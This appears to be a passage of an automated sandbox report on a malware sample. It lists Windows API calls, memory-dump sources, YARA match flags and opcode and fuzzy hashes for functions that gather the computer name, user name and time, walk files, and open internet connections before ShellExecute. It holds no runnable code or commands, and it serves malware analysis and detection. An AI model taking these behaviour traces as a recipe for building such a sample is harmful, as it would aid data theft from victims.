                                          • Instruction ID: b8d5882c083238003edf1a6b6ff8de7995e2e3a2044a888cca36394970a8603d
                                          • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                          • Instruction Fuzzy Hash: 6D116AB4920209EFCB04DFE4D948AEDBBB9FF04305F108469E80A67250EB706B14CF65
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 022D7C17
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D7C1E
                                          • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 022D7C2B
                                          • wsprintfA.USER32 ref: 022D7C5A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                                          • String ID:
                                          • API String ID: 377395780-0
                                          • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                          • Instruction ID: f6c2280583ec21be7368fcd936bc0d02ff9d83eeede8197f797cff8ce8c15987
                                          • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                          • Instruction Fuzzy Hash: 661139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280D3795940CBB1
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                          • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                          • wsprintfA.USER32 ref: 004179F3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocLocalProcessTimewsprintf
                                          • String ID:
                                          • API String ID: 1243822799-0
                                          • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                          • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                          • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                          • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 022D7CCA
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D7CD1
                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 022D7CE4
                                          • wsprintfA.USER32 ref: 022D7D1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                          • String ID:
                                          • API String ID: 3317088062-0
                                          • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                          • Instruction ID: 31563fb1acb5a61c383bb396fe1248a0c75aa6155b827a3ff62a938b4a82025e
                                          • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                          • Instruction Fuzzy Hash: D4115EB1A45228EFEB248B94DC49FA9B7B8FB05721F1043AAF51AA32C0C7785940CF51
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strtok_s
                                          • String ID:
                                          • API String ID: 3330995566-0
                                          • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                          • Instruction ID: 750e95f969a0477150c86f59d806d1b24ae9707aa5f47dd1aa27889de28c1d41
                                          • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                          • Instruction Fuzzy Hash: 85117CB4E5020AEFCB14CFE6D848BEEB7B5FB04304F00C028E025A6254D7749500CF56
                                          APIs
                                          • CreateFileA.KERNEL32(022D3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,022D3D55,?), ref: 022D9563
                                          • GetFileSizeEx.KERNEL32(000000FF,022D3D55), ref: 022D9580
                                          • CloseHandle.KERNEL32(000000FF), ref: 022D958E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleSize
                                          • String ID:
                                          • API String ID: 1378416451-0
                                          • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                          • Instruction ID: 79fde40eaafafd2070a01c7070736878cf65f8c040b1e7b612759facadf10e1e
                                          • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                          • Instruction Fuzzy Hash: 0BF04F39E50208BBDB20DFF0DC49B9E77BAEB49710F10C664FA11A7284D676A6418B40
                                          APIs
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,p/y,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022D6D31
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022D6D4F
                                          • CloseHandle.KERNEL32(00000000), ref: 022D6D60
                                          • Sleep.KERNEL32(00001770), ref: 022D6D6B
                                          • CloseHandle.KERNEL32(?,00000000,?,p/y,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022D6D81
                                          • ExitProcess.KERNEL32 ref: 022D6D89
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                          • String ID:
                                          • API String ID: 941982115-0
                                          • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                          • Instruction ID: 66ee53d06b68e8e1c73c801d135d128400f911e38055f409c9dd961443cea070
                                          • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                          • Instruction Fuzzy Hash: F9F058789A030AAEEB10ABE1FC08BBD767AEB05741F201A18F502A5198CBF04100CA66
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: `o@
                                          • API String ID: 0-590292170
                                          • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                          • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                          • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                          • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                          APIs
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022C6307: InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022C6376
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 022D35C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrcat$ExecuteInternetOpenShelllstrlen
                                          • String ID: <$0y
                                          • API String ID: 3003401316-3122580370
                                          • Opcode ID: 16d2995baf84a21b14fdaa21a84c5b405fb84e011815242cc6e2300966b204e3
                                          • Instruction ID: 54d128fbdb3fe3297c7b05da32ee64c066911053d963fd96d198d5f7b0475bc9
                                          • Opcode Fuzzy Hash: 16d2995baf84a21b14fdaa21a84c5b405fb84e011815242cc6e2300966b204e3
                                          • Instruction Fuzzy Hash: 3441FB719207089ACB08FFE4DD91EEDB77AAF24300F544659E00666198EF745B8ACF94
                                          APIs
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022C6307: InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022C6376
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 022D3751
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrcat$ExecuteInternetOpenShelllstrlen
                                          • String ID: <$0y
                                          • API String ID: 3003401316-3122580370
                                          • Opcode ID: 29151d059d308d6fed0a80f0f72b90cc4d8a133155f9bf52268d45dccb1657ee
                                          • Instruction ID: c2a96483b2bfc13b7b99ee9f5047b900a3e0f392a335b8eb1835d5361647e437
                                          • Opcode Fuzzy Hash: 29151d059d308d6fed0a80f0f72b90cc4d8a133155f9bf52268d45dccb1657ee
                                          • Instruction Fuzzy Hash: 9F411C719603089BDB08FFE0DE91EEDB77AAF24300F544159E00666198EF742B8ACF90
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 022D2FEC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                          • String ID: <$0y
                                          • API String ID: 3031569214-3122580370
                                          • Opcode ID: a0ed4cbfe93d0cc974da6044f8369c0878916f44a8cf608972f3da16a68e91da
                                          • Instruction ID: 80cbd763f894c9c6cc891cfcb1ec4039cbf5f6e29290f9a9bf4087d342ecaacd
                                          • Opcode Fuzzy Hash: a0ed4cbfe93d0cc974da6044f8369c0878916f44a8cf608972f3da16a68e91da
                                          • Instruction Fuzzy Hash: 5E41F971D203489BDB18EFE0D990FEDBB76AF20304F804559E006A7198EF742A8ACF51
                                          APIs
                                            • Part of subcall function 022D7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D7B77
                                            • Part of subcall function 022D7B47: RtlAllocateHeap.NTDLL(00000000), ref: 022D7B7E
                                            • Part of subcall function 022D7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 022D7B96
                                            • Part of subcall function 022D7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022C141E), ref: 022D7AE7
                                            • Part of subcall function 022D7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 022D7AEE
                                            • Part of subcall function 022D7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 022D7B06
                                          • ExitProcess.KERNEL32 ref: 022C142D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                                          • String ID: @.y$p/y
                                          • API String ID: 3550813701-1348988211
                                          • Opcode ID: bf35b918970ebe437c849f5eab052a6292da9b1e5ad86061bb4b797f83571a8f
                                          • Instruction ID: 806c13aa53930e83d4d00f63bce609a4e4c58c13de699f736cd2c483fa5e31dd
                                          • Opcode Fuzzy Hash: bf35b918970ebe437c849f5eab052a6292da9b1e5ad86061bb4b797f83571a8f
                                          • Instruction Fuzzy Hash: 69E012B5A6130162DB1477F07C05B2A765F5F14306F445518EA0CC6105FA79E1118962
                                          APIs
                                          • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                          • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                          • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                          • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFileNextlstrcat
                                          • String ID: !=A
                                          • API String ID: 3840410801-2919091325
                                          • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                          • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                          • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                          • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpynlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 1206339513-0
                                          • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                          • Instruction ID: 7e26b8b8349ad769fab3316aff57c14d19104d6e548a59effb6e6b9c80821380
                                          • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                          • Instruction Fuzzy Hash: 8A01DA79540109FFCB04DFECD998EAE7BBAEF49394F108148F9099B305C635AA40DB95